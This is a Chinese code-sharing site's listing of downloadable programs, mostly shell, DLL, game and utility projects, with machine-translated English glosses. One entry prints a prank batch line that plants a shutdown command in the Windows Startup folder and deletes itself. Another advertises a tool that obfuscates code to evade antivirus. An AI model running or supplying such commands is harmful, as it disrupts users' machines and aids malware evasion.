搜索资源列表
dll_myown
- 动态链接库程序的编写。静态库与动态库的区别,以及调用程序在链接静态库和动态库时的区别。如何利用工具查看动态链接库输出的函数,Depends工具的使用,C++编译器名字改编技术对动态链接库输出函数的影响,extern \"C\"的用法,利用模块定义文件来解决C++名字改编的问题。用typedef定义指向函数的指针类型,如何获得动态连接库里的函数的指针。-dynamic link library of writing. Static and Dynamic Library for the disti
tic-tac-toe
- 一个简单的用二叉树实现的极大极小指算法人工智能井字棋游戏,使用C++的类,和STL模版库中的vector-A simple binary tree the minimax means algorithm artificial intelligence tic-tac-toe game of chess the class of C++, and STL template library in the vector
shell
- 在linux下用C语言实现简单的shell命令-A simple shell command under linux using C language
C++getfile
- c++ 程序设计中经常需要用到的代码,希望能够帮助大家-c++ programming often necessary to use the code, hoping to help people
C++shell
- 一直在犹豫,到底是用string 来当参数呢,还是用char *来当参数呢?现在还没有实现重定向和批处理-Has been hesitant to come in the end is when the parameters of string, or char* to use it when the parameters? Has yet to achieve the redirection and batch
Ckill
- 用VB写的C++源码加花*程序,写的比较菜!但效果还是可以的!-Writing with VB source code in C++ add flower free kill procedures, comparison of Writing dishes! But the results still can!
start_virunner
- VIRUNNER-START 读写VIJOS题库时的源码,用纯C编写,截面为CMDSHE-VIRUNNER-START at the time of reading and writing questions VIJOS source, with the preparation of pure C, cross-section for CMDSHELL
shell
- 实现带参数的简单shell 1、除了系统调用execve,不允许使用其他的exec函数。输入应当允许带多个参数(一行内可以表示),不考虑通配符 (即“*”、“?”、“-”等等)的处理。 2、输入错误命令能提示出错并进入下一轮接收命令状态。 3、可以用Ctrl-C和Ctrl-\结束简单shell的运行。 4、程序运行正确,提示简洁明确。 -Parameters to achieve a simple shell 1, apart from the system call exe
cf
- 一个linux下的用c语言实现的一个简单的cf程序-Under a linux c language using a simple procedure cf
md5sum
- MD5的计算软件用c编写,MD5的计算软件用c编写-MD5 calculation software written in c the MD5 calculation software written with c
shell
- 这是一个简单的shell程序的设计。用的是c语言实现的基本的操作。-This is a simple shell program design. C language basic operation.
PPIDs_1.2
- PPIDs 用于列举进程的父PID和子PID PPIDs v 1.2 [2013/03/18] http://bbs.bathome.net 用法: PPIDs.exe [/NUM] [/p|/c] [/r] [/i] [/e] [/n] [PName|[PID] [PID] ...] 模式: /NUM 向上追溯曾曾曾...曾祖父辈进程的PID /p 获取直系父进程PID (默认) 返回: 父进程PID 爷爷进程PID 曾爷爷PID ... /c 获取某
lex-and-syntax-
- 用C语言编写的一个特定文法的词法分析器,内有文法描述PPT和实验指导书,电子科技大学的编译原理实验哦-Using C language of a particular grammar lexical analyzer, there grammar descr iption PPT and guide books, the University of Electronic Science and Technology Compiler Principle Experiment oh
Exception
- 很哟用的异常处理方法 方便使用 参考学习 C-Very yo exception handling method is convenient to use reference learning C++
PrettyGirl
- 一个及其简单的自动关机脚本,作弄人用的。 @echo shutdown -s -t -c "世界崩溃了 :-(" 60 > ALLUSERSPROFILE \「开始~1\程序\启动\x.bat @del /f/q/a ~dpnx0 > nul -A simple and automatic shutdown scr ipts, for prank.
CmdAsUser
- CmdAsUser - start a command as a specified user Usage: CmdAsUser <user> <domain> [/p <password>] [/c <command>] 介绍一个控制台实用程序,在 Windows NT 系统中运行,它以专门的用户身份启动某个程序命令。它用 Windows API 函数 LogonUser 编程,以专门的用户身份/密码登陆到NT。如果登陆成功,则用 Cre
bash-tcsh
- 介绍bash和tcsh,tcsh是在csh基础上扩展的,具有和C语言类似的句法。bash则是LINUX各版本的默认SHELL,而且,在写脚本方面更方便。两者不兼容,bash 有更多的优势,从这个意义上说,如果没有特殊需要,最好从一开始就用bash, 而不用tcsh。-Introduction bash and tcsh, tcsh csh is based on the expansion, with a C like syntax. bash is the default SHELL LINU